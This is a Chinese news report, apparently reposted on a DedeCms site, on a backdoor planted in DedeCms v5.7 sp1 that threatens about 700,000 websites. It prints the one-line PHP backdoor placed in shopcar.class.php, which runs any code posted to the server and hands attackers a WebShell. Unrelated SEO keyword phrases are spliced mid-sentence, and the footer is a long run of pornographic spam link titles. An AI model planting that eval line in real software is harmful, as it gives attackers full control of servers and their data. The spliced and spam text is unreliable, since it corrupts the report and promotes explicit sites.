返回頂部
關(guān)閉軟件導(dǎo)航
位置:首頁 > 資訊 > 織夢新聞>織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保
  

  【IT168資訊】瑞星公司今日對外發(fā)布緊急警示:國內(nèi)知名的PHP開源網(wǎng)站管理系統(tǒng)——織夢CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門,黑客可通過此后門直接獲得網(wǎng)站的控制權(quán)限,獲取存儲在服務(wù)器上的文件和數(shù)據(jù)庫。據(jù)CMS官方數(shù)據(jù)顯示,目前約有70萬網(wǎng)站使用該系統(tǒng)搭建織夢文章批量自動上傳助手,涉及企業(yè)、政府機(jī)關(guān)、媒體機(jī)構(gòu)、行業(yè)及個人網(wǎng)站等。瑞星公司特此緊急提醒使用該系統(tǒng)的網(wǎng)站管理員織夢批量更新 ,使用瑞星網(wǎng)站密碼安全檢測系統(tǒng)查找后門并及時進(jìn)行封堵。

  

  據(jù)專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門織夢軟件采集,黑客只需要構(gòu)造簡單的數(shù)據(jù)包提交到服務(wù)器,就能夠獲取到該網(wǎng)站的WebShell,通過對服務(wù)器進(jìn)一步滲透攻擊,進(jìn)而獲取服務(wù)器的最高權(quán)限。

  

  織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網(wǎng)站后,便可以直接訪問服務(wù)器上的文件、數(shù)據(jù)庫等信息。目前我國有大量網(wǎng)站采用該系統(tǒng),此后門或?qū)?dǎo)致大量用戶的信息泄露,造成極為嚴(yán)重的影響。

如果您覺得 織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保 這篇文章對您有用,請分享給您的好友,謝謝
文章地址:http://www.meyanliao.com/article/dede/zmCMSxtxhmwwzzlkbb.html
解放雙手無盡可能,有問題添加天線貓微信
主站蜘蛛池模板: 免费a级毛片无码av| 国产V片在线播放免费无码| 乱人伦人妻中文字幕无码| 最新中文字幕av无码专区| 无码av人妻一区二区三区四区| 亚洲日韩乱码中文无码蜜桃臀| 亚洲av永久无码一区二区三区| 永久免费av无码网站大全| 亚洲A∨无码无在线观看| 少妇仑乱A毛片无码| 国产亚洲精久久久久久无码77777| 日韩精品无码一本二本三本| 国产高清不卡无码视频| 无码少妇一区二区性色AV| 无码综合天天久久综合网| 无码人妻熟妇AV又粗又大| 内射无码午夜多人| 亚洲一本到无码av中文字幕| 亚洲无码高清在线观看| 亚洲AV无码国产剧情| 亚洲AV永久无码精品水牛影视| 真人无码作爱免费视频| 亚洲中文字幕无码久久| 亚洲gv猛男gv无码男同短文| 国产精品无码翘臀在线观看| 99精品一区二区三区无码吞精| 狠狠精品久久久无码中文字幕 | 精品国产a∨无码一区二区三区 | 国产av无码久久精品| 久久99精品久久久久久hb无码| 日韩精品无码人成视频手机| 无码色AV一二区在线播放| 亚洲一区AV无码少妇电影| AV无码免费永久在线观看| 无码精品人妻一区二区三区人妻斩| 人妻丰满?V无码久久不卡| av无码aV天天aV天天爽| 国产成人无码区免费A∨视频网站 国产成人无码午夜视频在线观看 国产成人无码精品一区不卡 | 亚洲AV无码一区二三区| 国产精品无码一本二本三本色 | 精品无码国产自产在线观看水浒传|